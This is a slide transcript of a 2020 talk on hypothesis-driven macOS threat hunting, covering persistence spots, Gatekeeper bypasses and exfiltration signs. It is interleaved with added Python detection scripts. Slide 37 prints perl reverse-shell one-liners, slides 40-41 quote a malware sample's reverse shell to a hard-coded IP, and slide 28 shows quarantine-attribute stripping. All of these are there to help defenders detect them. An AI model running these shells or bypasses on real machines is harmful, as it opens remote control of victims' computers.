
Hypothesis driven MacOs Threat Hunting

plug
May 01, 2020


In this presentation we share a technique for creating great hypotheses and introduce a methodology for conducting Threat Hunting regardless of the operating system. We introduce some items you should hunt for in macOS and provide examples of what that looks like. Enjoy!


Transcript

  1. osquery> select * from logged_in_users ;
    +------+------+---------+------+----------+-----+
    | type | user | tty     | Role | Passtime | pid |
    +------+------+---------+------+----------+-----+
    | user | Art  | console | DFIR | <secret> | 88  |
    | user | Plug | ttys01  | DFIR | Synths   | 133 |
    +------+------+---------+------+----------+-----+
    osquery>
  2. Agenda:
    • Background for the talk
    • The Hypothesis and hunt process
    • Things to Hunt in macOS
    • Putting into action: Let’s go Hunt
    • Final Notes
    • Questions
  3. What is Hunting...
    • It is "the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions." -Wikipedia
  4. What is Hunting...
    • “Simply put, hunting is the act of finding ways for evil to do evil things” -Danny Akacki
  5. Hunt Use Cases [What should I hunt]
    • Previous Incident
    • Threat Intel Data
    • Adversary Emulation
    • Research
    • Red Team
    • Crown Jewels
    • Defense Posture Assumptions
  7. The Hypothesis
    • “A supposition or proposed explanation made on the basis of limited evidence as a starting point for further investigation.”
  8. The Hypothesis and the 6 Ws
    • PURPOSE
    • REASON BEHIND THE HUNT
    • DATE
    • TIME
    • DURATION
    • THE LOCATION OF ARTIFACTS WE WANT TO HUNT IN THE DATA
    • THE ITEM WE WANT TO HUNT
    • USERNAME/ACCOUNT
    • HOSTNAME
    • IP/PORT
  9. The Hypothesis and the 6 Ws
    • THE WAY WE ARE GOING TO CONDUCT THE HUNT
  11. Hunt Process - Step 1: Do I have a hypothesis?
    • Who
    • What
    • When
    • Where
    • Why
    • How
    Yes / No / No idea. If No or No idea: Create one!
  12. Hunt Process - Step 2: Do I have the data to test the hypothesis?
    • Do I have any logs?
    • Are logs being forwarded?
    • Do I have the right index?
    • Do I have the proper events?
    Yes / No / No idea. If No or No idea: Get data! If Yes: Go hunt!
  13. Hunt Process - Step 3: Do I need a test case?
    // Example gscript template
    // Title: Launch Agent Persistence
    // Author: ahhh
    // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent
    // Gscript version: 1.0.0
    // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159
    Yes / No / No idea. If Yes: Create one! If No: Go hunt!
  14. Hunt Process - Step 4: Do I know what to look for?
    • Launch Daemons/Agents
    • Kernel extensions
    • Cron Jobs
    • Gatekeeper and XProtect Bypasses
    • Abnormal Shell Activity
    • Browser extensions
    Yes / No / No idea. If No or No idea: Research!
  15. Hunt Process Flow - Improve your Defenses
    Wins:
    • Fewer visibility gaps
    • Better data
    • Better detections
    • Metrics that quantify why the hunt program is valuable!
  16. Hunt Process Flow - Any issues found?
    Anything that requires immediate attention should get prioritized and escalated.
  17. Hunt Process Recap
    • Hypothesis
    • Data
    • Test Case
    • Hunt
    • Review Findings
    • Escalate [if needed]
    • Document Findings
    • Remediate Gaps
    • Improved Detections
    • Repeat
  18. In short
    • How do I get started? Create a hypothesis and follow a process.
    • What should I hunt? Totally up to you; use hunt cases as a basis.
  19. macOS Malware
    • Mami
    • CrossRAT
    • CreativeUpdate
    • Shlayer
    • Dummy
    • Calisto
    • AppleJeus
    • WindTail
    • etc.
    https://objective-see.com/blog/blog_0x3C.html
  20. Places with great indicators
    • Launch Daemons
    • Launch Agents
    • Kernel extensions
    • Cron Jobs
    • Browser extensions
    • Abnormal Shell Activity
    • Gatekeeper and XProtect Bypasses
    • Exfiltration
  21. Launch (Daemon|Agent)s
    • .plist (configuration) files
      ◦ Start, stop and manage scripts and processes
    • Launch Daemons
      ◦ Run without a logged in user.
      ◦ No GUI interaction.
      ◦ Stored in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/
  22. Launch (Daemon|Agent)s
    • Launch Agents
      ◦ Associated user must be logged in.
      ◦ GUI interaction.
      ◦ Stored in /System/Library/LaunchAgents, /Library/LaunchAgents and ~/Library/LaunchAgents
    • Equivalent to run keys and services on Windows
  23. Kernel extensions (In Catalina: system extensions)
    • "OS X provides a kernel extension mechanism as a means of allowing dynamic loading of code into the kernel, without the need to recompile or relink. Because KEXTs provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to internal kernel interfaces" -- [BADNESS!] -- https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Extend/Extend.html
    • KMs are typically loaded into /lib/modules as extension .ko
    • Adversaries will check KMs before loading maliciousness to ensure compilation
    • Monitor for execution of kextload commands
      ◦ Correlate with known goods.
    https://attack.mitre.org/techniques/T1215/
  24. Kernel extensions (In Catalina: system extensions)
    Differences:
    • KEXTs execute their code at the macOS kernel level.
    • System extensions leverage controlled user space.
    https://attack.mitre.org/techniques/T1215/
    Hypothesis idea: Do we have non-standard kext loads in our environment? Are security tools being kext-unloaded?
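The two hypotheses above (non-standard kext loads, security tools being unloaded) can be tested against a per-host kext inventory such as the one osquery's kernel_extensions table returns. The Python below is an added example and not code from the deck: it racks and stacks kext names across a constructed four-host fleet, subtracts a hypothetical known-good list, and reports the rare kexts, the kexts loaded from outside the standard extension directories, and the hosts where an expected security-tool kext is absent. FLEET, KNOWN_GOOD, the placeholder bundle id com.example.edr and the 25% rarity threshold are all assumptions made for this example.

```python
"""Hunt non-standard kernel extensions by racking and stacking a per-host
kext inventory and subtracting known goods. Added example, not the deck's code."""
from collections import defaultdict

# Constructed sample data: per-host rows shaped like osquery's
# kernel_extensions table (name, path). Every value here is made up.
FLEET = {
    "mac-01": [("com.apple.driver.AppleHDA", "/System/Library/Extensions/AppleHDA.kext"),
               ("com.example.edr", "/Library/Extensions/EDRSensor.kext")],
    "mac-02": [("com.apple.driver.AppleHDA", "/System/Library/Extensions/AppleHDA.kext"),
               ("com.example.edr", "/Library/Extensions/EDRSensor.kext")],
    "mac-03": [("com.apple.driver.AppleHDA", "/System/Library/Extensions/AppleHDA.kext"),
               ("com.example.edr", "/Library/Extensions/EDRSensor.kext"),
               ("com.vendor.vpn", "/Library/Extensions/VendorVPN.kext")],
    "mac-04": [("com.apple.driver.AppleHDA", "/System/Library/Extensions/AppleHDA.kext"),
               ("com.unknown.helper", "/Users/Shared/.h/helper.kext")],
}

# Assumptions for this example: what has already been vetted, what must be
# loaded everywhere (placeholder security-tool kext), and where legitimately
# installed kexts live.
KNOWN_GOOD = {"com.vendor.vpn"}
EXPECTED_ON_EVERY_HOST = {"com.example.edr"}
STANDARD_DIRS = ("/System/Library/Extensions/", "/Library/Extensions/")


def rack_and_stack(fleet):
    """Map each kext name to the set of hosts that have it loaded."""
    hosts_by_kext = defaultdict(set)
    for host, rows in fleet.items():
        for name, _path in rows:
            hosts_by_kext[name].add(host)
    return hosts_by_kext


def rare_kexts(fleet, max_fraction=0.25):
    """Kexts loaded on at most max_fraction of hosts, with known goods removed."""
    total = len(fleet)
    return {name: sorted(hosts)
            for name, hosts in rack_and_stack(fleet).items()
            if len(hosts) / total <= max_fraction and name not in KNOWN_GOOD}


def nonstandard_paths(fleet):
    """Kexts loaded from outside the two standard extension directories."""
    return [(host, name, path)
            for host, rows in fleet.items()
            for name, path in rows
            if not path.startswith(STANDARD_DIRS)]


def missing_expected(fleet):
    """Hosts where a kext we expect (the EDR sensor) is not loaded.
    A gap here is the lead for a kextunload hunt on that host."""
    return {host: sorted(EXPECTED_ON_EVERY_HOST - {name for name, _ in rows})
            for host, rows in fleet.items()
            if not EXPECTED_ON_EVERY_HOST <= {name for name, _ in rows}}


def hunt_kexts(fleet):
    """Run all three checks and return the findings grouped by check."""
    return {"rare": rare_kexts(fleet),
            "nonstandard_path": nonstandard_paths(fleet),
            "missing_expected": missing_expected(fleet)}


if __name__ == "__main__":
    for section, findings in hunt_kexts(FLEET).items():
        print(section, findings)
```

On a real fleet, replace FLEET with the rows your osquery/Fleet deployment returns per host; the value of the approach is that com.vendor.vpn, which is just as rare as the unknown helper, drops out once it is on the known-good list, leaving only the outliers to review.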
  25. Cron Jobs
    • /etc/crontab file, /etc/cron.d/
    • at
    • launchd
      ◦ Each launchd job is described by a different (plist) file
      ◦ Additional key called: StartCalendarInterval
    • What is normal in your environment?
      ◦ Rack and stack -- find the outliers!
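Slides 21, 22 and 25 name the launchd plist directories and the StartCalendarInterval key. The following Python is an added example, not code from the deck or from any tool it mentions: it parses launchd plists with the standard plistlib module and scores each job by how far it sits from a normal install. The scoring heuristics (temporary or shared directories, interpreter one-liners, Apple-style labels outside /System, RunAtLoad combined with KeepAlive), the SAMPLE_JOBS and their labels are assumptions made for this example; collect_plists() reads the real directories when run on a Mac.

```python
"""Hunt launchd persistence: parse LaunchDaemon/LaunchAgent plists and rank
the jobs that look least like the rest of the environment. Added example."""
import os
import plistlib

# Directories launchd reads job definitions from (slides 21-22).
LAUNCHD_DIRS = [
    "/System/Library/LaunchDaemons", "/Library/LaunchDaemons",
    "/System/Library/LaunchAgents", "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
]
# Assumptions for this example: paths a persistent job rarely runs from
# legitimately, and interpreters that point at an inline script.
SUSPICIOUS_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
INTERPRETERS = {"sh", "bash", "zsh", "perl", "python", "python3", "ruby", "osascript"}


def parse_job(data, source):
    """Normalise one launchd plist (XML or binary) into hunter-friendly fields."""
    job = plistlib.loads(data)
    args = list(job.get("ProgramArguments") or [])
    program = job.get("Program") or (args[0] if args else "")
    return {
        "source": source,
        "label": job.get("Label", ""),
        "program": program,
        "args": args,
        "run_at_load": bool(job.get("RunAtLoad", False)),
        "keep_alive": bool(job.get("KeepAlive", False)),  # bool or a dict of conditions
        # StartCalendarInterval/StartInterval make the job launchd's cron equivalent
        "scheduled": "StartCalendarInterval" in job or "StartInterval" in job,
    }


def score_job(job):
    """Return the reasons a job deserves a closer look; more reasons = higher score."""
    reasons = []
    base = os.path.basename(job["program"])
    if job["program"].startswith(SUSPICIOUS_PREFIXES):
        reasons.append("program lives in a temporary or shared directory")
    if base in INTERPRETERS and any(a in ("-c", "-e") for a in job["args"]):
        reasons.append("interpreter started with an inline script")
    if any(a.startswith(SUSPICIOUS_PREFIXES) for a in job["args"][1:]):
        reasons.append("argument references a temporary or shared directory")
    if job["label"].startswith("com.apple.") and not job["source"].startswith("/System/"):
        reasons.append("Apple-style label outside /System (look-alike?)")
    if job["run_at_load"] and job["keep_alive"]:
        reasons.append("RunAtLoad + KeepAlive: restarts on kill and on login/boot")
    return reasons


def hunt_launchd(plists):
    """plists: iterable of (source_path, raw_bytes). Returns jobs, most suspicious first."""
    results = []
    for source, data in plists:
        job = parse_job(data, source)
        job["reasons"] = score_job(job)
        job["score"] = len(job["reasons"])
        results.append(job)
    return sorted(results, key=lambda j: j["score"], reverse=True)


def collect_plists(dirs=LAUNCHD_DIRS):
    """Yield (path, bytes) for every .plist under the launchd directories on a real Mac."""
    for d in dirs:
        if os.path.isdir(d):
            for name in sorted(os.listdir(d)):
                if name.endswith(".plist"):
                    path = os.path.join(d, name)
                    with open(path, "rb") as fh:
                        yield path, fh.read()


# Constructed sample jobs so the hunt runs offline; labels and paths are made up.
SAMPLE_JOBS = [
    ("/Library/LaunchDaemons/com.example.backupd.plist", {
        "Label": "com.example.backupd",
        "Program": "/usr/local/bin/backupd",
        "StartCalendarInterval": {"Hour": 2, "Minute": 0},
    }),
    (os.path.expanduser("~/Library/LaunchAgents/com.apple.updater.plist"), {
        "Label": "com.apple.updater",
        "ProgramArguments": ["/bin/sh", "-c", "/private/tmp/.cache/agent"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
]


def hunt_samples():
    """Run the hunt over the constructed jobs (serialised to real plist bytes)."""
    return hunt_launchd((src, plistlib.dumps(d)) for src, d in SAMPLE_JOBS)


if __name__ == "__main__":
    for job in hunt_samples():  # swap in collect_plists() on a real host
        print(job["score"], job["label"], job["source"], job["reasons"])
```

The scheduled field is reported rather than scored on purpose: a StartCalendarInterval job is only an outlier relative to what is normal in your environment, which is the rack-and-stack step of slide 25, not a property of the plist alone.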
  26. Browser extensions
    • Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions.
      ◦ Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
    • Monitor for any new items written to the Registry or PE files written to disk.
      ◦ May correlate with browser extension installation.
    https://attack.mitre.org/techniques/T1176/
  27. Abnormal Shell Activity
    • Odd SSH commands (ssh -R with a follow-on external connect?)
    • Local port forwards
    • Why are you touching /etc/pam.d/sudo?
      ◦ SPOILER: TOUCH TO SUDO! (or badness)
    • Stomping history files
    • What is that running from /tmp/?
    • etc.
  28. Gatekeeper and XProtect Bypasses
    • When files are downloaded from the internet the com.apple.quarantine attribute flag is set.
      ◦ At program execution this flag will prompt the user to allow or deny execution, as the system acknowledges that the file was downloaded from the internet.
    • Files from external media or network shares do not set this flag!
      ◦ The Gatekeeper check is now bypassed.
      ◦ Hunt for this attribute being removed with:
        ▪ xattr -r -d com.apple.quarantine /path/to/MyApp.app
    https://attack.mitre.org/techniques/T1144/ (courtesy of osxdaily.com)
  29. Exfiltration
    • Mass Directory Compression
    • Keyword Searching
      ◦ pass, pw, password, key, token
      ◦ $mySuperSecretSpecialSauce
    • Cloud Storage Solutions
      ◦ Does your AUP allow:
        ▪ DropBox
        ▪ iCloud
        ▪ etc.
    • Pastebin (etc etc etc)
      ◦ Monitor uploads
    • Corporate Mobile Use
      ◦ Blind (etc etc etc)
  30. Putting into action: Let’s go Hunt
    Step 1, Step 2, Step 3, Step 4, Step 5
    The Lab Setup
  31. Huntlab - Host and Network Visibility
    Host Level + Network Level = Hunters Dream!
  32. Huntlab
    • Gscript - @alexlevinson and CCDCRedTeam
    • EvilOsx - Marten4n6
    • Apfell - @its_a_feature_
    • Some malware :)
    • Old fashion console
    Huge props and thanks to: @1njecti0n
  33. macOS Prompt for Password
    Event / Activity / Secrets Collected
    Hypothesis: What OSAScripts do we have visibility into? Any outliers?
  34. macOS Prompt for Password
    Kibana example of the gscript being created and executed!
    Beware of Legit App Activity
  36. Unleash the Owl! - https://molo.ch ~ https://github.com/aol/moloch
    Moloch is a large scale, open source, indexed packet capture and search tool (FPC).
    Shout-outs to: Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch!
  37. Hunting perl tty/reverse shells
    • perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    • perl -e 'exec "/bin/sh";'
    • perl: exec "/bin/sh";
    • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  40. Rotten Pears - Shell Code
    {"GLOBALS"}["kirihqh"]="str";${${"GLOBALS"}["kirihqh"]}="use Socket; print "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || socket(SERVER, PF_INET, SOCK_STREAM, $proto)
  41. Rotten Pears - Reverse Shell
    sh -c perl -e 'use Socket; print "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || exit(); …snip… print("exec"); exec {"/bin/sh"} "-bash" . "\0" x 4; print("exit"); exit(0); }' > /dev/null 2>/dev/null
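Slides 23-24 (kextload/kextunload executions), 27 (ssh -R, /etc/pam.d/sudo, binaries in /tmp), 28 (stripping com.apple.quarantine) and 37-41 (perl shells) all reduce to command-line patterns in process execution telemetry. The Python below is an added example, not code from the deck: it runs a small rule set over constructed events shaped like osquery's process_events rows (pid, uid, path, cmdline). SAMPLE_EVENTS, the perl regex and the rule wording are assumptions made for this example; a hit is a lead to correlate against your baseline, not a verdict.

```python
"""Hunt macOS process execution events for the command-line patterns the deck
calls out: kext (un)loads, quarantine stripping, perl shells, odd ssh use.
Added example, not the deck's code."""
import os
import re
import shlex

# Constructed events shaped like osquery's process_events rows. Every value
# (pids, uids, hostnames, paths) is made up for this example.
SAMPLE_EVENTS = [
    {"pid": 401, "uid": 0, "path": "/usr/bin/kextunload",
     "cmdline": "kextunload -b com.example.edr"},
    {"pid": 402, "uid": 501, "path": "/usr/bin/xattr",
     "cmdline": "xattr -r -d com.apple.quarantine /Users/art/Downloads/Installer.app"},
    {"pid": 403, "uid": 501, "path": "/usr/bin/perl",
     "cmdline": "perl -MIO::Socket -e '$c=new IO::Socket::INET(PeerAddr => \"x.x.x.x:xx\");'"},
    {"pid": 404, "uid": 501, "path": "/usr/bin/ssh",
     "cmdline": "ssh -R 2222:localhost:22 user@x.x.x.x"},
    {"pid": 405, "uid": 0, "path": "/usr/bin/touch",
     "cmdline": "touch /etc/pam.d/sudo"},
    {"pid": 406, "uid": 501, "path": "/private/tmp/.x/updater",
     "cmdline": "/private/tmp/.x/updater"},
    {"pid": 407, "uid": 501, "path": "/bin/ls", "cmdline": "ls -la /Users/art"},
]

TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
# Perl idioms shared by the reverse/tty shell one-liners on slide 37.
PERL_SHELL = re.compile(r"IO::Socket|use Socket|exec\s*[\"'{(]*\s*/bin/(ba)?sh")


def tokens(cmdline):
    """Split a command line; fall back to whitespace when quoting is broken."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def rule_kext(ev, base, argv):
    # Slide 23: monitor kextload executions and correlate with known goods.
    if base in ("kextload", "kextunload"):
        return f"{base} executed: correlate with known-good kexts"


def rule_quarantine(ev, base, argv):
    # Slide 28: the attribute whose removal sidesteps the Gatekeeper prompt.
    if base == "xattr" and "-d" in argv and "com.apple.quarantine" in argv:
        return "quarantine attribute stripped (Gatekeeper bypass)"


def rule_perl_shell(ev, base, argv):
    # Slides 37-41: perl started with socket/exec-shell idioms.
    if base == "perl" and PERL_SHELL.search(ev["cmdline"]):
        return "perl tty/reverse shell pattern"


def rule_shell_activity(ev, base, argv):
    # Slide 27: odd ssh use, touching the sudo PAM file, running from /tmp.
    if base == "ssh" and "-R" in argv:
        return "ssh remote port forward (-R)"
    if base == "touch" and "/etc/pam.d/sudo" in argv:
        return "touching /etc/pam.d/sudo"
    if ev["path"].startswith(TMP_PREFIXES):
        return "binary executed from a temporary directory"


RULES = [rule_kext, rule_quarantine, rule_perl_shell, rule_shell_activity]


def hunt_process_events(events):
    """Apply every rule to every event; return findings in event order."""
    findings = []
    for ev in events:
        base, argv = os.path.basename(ev["path"]), tokens(ev["cmdline"])
        for rule in RULES:
            hit = rule(ev, base, argv)
            if hit:
                findings.append({"pid": ev["pid"], "uid": ev["uid"],
                                 "finding": hit, "cmdline": ev["cmdline"]})
    return findings


def hunt_samples():
    """Run the rules over the constructed events."""
    return hunt_process_events(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in hunt_samples():
        print(f"pid={f['pid']} uid={f['uid']} {f['finding']}: {f['cmdline']}")
```

The rules key on the executable's basename plus parsed arguments rather than on a substring of the whole command line, so "kextload" in an unrelated argument or a quoted path does not fire; the shlex fallback exists because hostile command lines are exactly the ones most likely to carry unbalanced quotes.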
  42. Recap
    • How do I get started? Create a hypothesis and follow a process.
    Step 1, Step 2, Step 3, Step 4, Step 5
  43. Props:
    • @1njecti0n - Awesome Red Teamer, check out his blog: https://lockboxx.blogspot.com/
    • The folks and community behind Osquery and Fleet
    • Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch!
    • DC562, Reverse Shell Corp (RSC)
  44. Props:
    • @4ensic8 - Art Maddalena (awesome coworker) who could not be here presenting with me. You rock dude!
    • The folks and community behind Derpcon
    • The amazing community at the Threat Hunters Forge Slack Channel https://launchpass.com/threathunting
    • Join the APT29 Evals Detection Hackathon! (May 2nd) https://mordordatasets.com/hackathons/apt29.html
    • The Awesome Paranoids Team
    • You, thanks for watching!
    The Paranoids FIRE Team #IRLife